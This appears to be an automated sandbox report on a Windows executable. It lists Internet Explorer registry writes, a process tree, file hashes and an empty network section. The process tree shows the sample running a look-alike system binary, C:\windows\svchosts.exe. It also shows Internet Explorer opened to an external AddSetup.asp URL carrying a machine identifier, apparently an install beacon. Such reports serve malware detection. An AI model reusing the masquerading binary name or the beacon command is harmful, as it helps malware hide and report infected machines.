Every row below is written by Internet Explorer itself (see the Process column) during the browser session the sample started with a URL. All keys sit under \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\ (the log spells the prefix as both Software and SOFTWARE; the key is the same); that prefix is omitted from the Indicator column.
Description | Indicator | Process | Target
Key created | GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | VersionManager | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | VersionManager\LastUpdateLowDateTime = "3157588233" | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (data) | TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e39000000000200000000001066000000010000200000009c70f54014405554453b5242b3a64bc47e3eeefe044527e2510319099c68afcf000000000e8000000002000020000000a47534c45056f5f8c743e9995f0bfa5e1cd92ea780ba73829b0bb4539042bf7a200000000d95bc7125e4f6aea8da9cde04108d4dc1c311903889cc01f7dd83c6a504c257400000001cc70d6480c23e56d091a56271883bdeec06da0ff40d9e272bc281c4e25a97a9aac979852908da211ede71c502ce70e2f2653837a8db42b55e8c888dce50e7e8 | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | DomainSuggestion | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (data) | Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | Recovery\AdminActive\{E7C6A987-8C29-11EF-ADF2-EE81E66BE9E9} = "0" | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Recovery\PendingRecovery | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | Recovery\PendingRecovery\AdminActive = "0" | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | DomainSuggestion\FileNames\ | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Main | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | TabbedBrowsing\NTPFirstRun = "1" | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (data) | TabbedBrowsing\NewTabPage\LastProcessed = 100fa4bd3620db01 | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | VersionManager\LastCheckForUpdateHighDateTime = "31137846" | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Main\WindowsSearch | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (str) | Main\FullScreen = "no" | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | TabbedBrowsing\NewTabPage | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | Main\CompatibilityFlags = "0" | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | DomainSuggestion\FileNames | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (data) | TabbedBrowsing\NewTabPage\LastProcessed = 20e39cbd3620db01 | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | VersionManager\LastTTLLowDateTime = "1251635200" | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | VersionManager\LastTTLHighDateTime = "50" | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Set value (int) | VersionManager\LastCheckForUpdateHighDateTime = "31137846" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | DomainSuggestion\FileNames\ | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | DomainSuggestion | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | Recovery\AdminActive | C:\progra~1\Intern~1\iexplore.exe | N/A
Key created | TabbedBrowsing | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (str) | DomainSuggestion\FileNames\en-US = "en-US.1" | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | VersionManager\LastCheckForUpdateLowDateTime = "3164306885" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Set value (str) | GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Set value (int) | VersionManager\LastUpdateHighDateTime = "31137846" | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | VersionManager\LastCheckForUpdateLowDateTime = "3157744368" | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (data) | TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e39000000000200000000001066000000010000200000006663c5dc132f6a8a14f66db290ab6f9485b3bf692775244e8dc50f2ae5d0e831000000000e800000000200002000000065619fdce6566372f8eac5ce1dfb004939679bea1d3737b0b9b47c161b6485b220000000b0d39a26ce4c8538f383ca83d1d5c13ade51c0d5fb826a170cc80383c848a1e3400000006eb328adb52ab15a3873cbeb62e3aa04fe568cc464cca9aa0d7b663de3f8cac64d543a775e9b19cc730f9ad17919b367f962a7d54387ee8161fb0eecdde4da34 | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (int) | DomainSuggestion\NextUpdateDate = "435894683" | C:\progra~1\Intern~1\iexplore.exe | N/A
Set value (str) | Main\WindowsSearch\Version = "WS not running" | C:\progra~1\Intern~1\iexplore.exe | N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\progra~1\Intern~1\iexplore.exe N/A
N/A N/A C:\windows\svchosts.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe

"C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe"

C:\windows\svchosts.exe

C:\windows\svchosts.exe auto

C:\progra~1\Intern~1\iexplore.exe

C:\\progra~1\\Intern~1\\iexplore.exe http://jianqiangzhe1.com/AddSetup.asp?id=137&localID=232138804165&isqq=3

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2032 CREDAT:17410 /prefetch:2

Network


Files

C:\Windows\svchosts.exe

MD5 43c6fd6fc51136632b47a8672de41034
SHA1 a22897d94f9d1ef123cbb1e372a619113327c214
SHA256 d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80
SHA512 f64b041b5a6afb4412496b526be0059814e4aac587764b36aa5b553ebe9d92533a162f484adc4b705853d65f59f262a91ad8888b84f6c1b7ac1099725fdd4e6a

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\TRPPE7V2\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee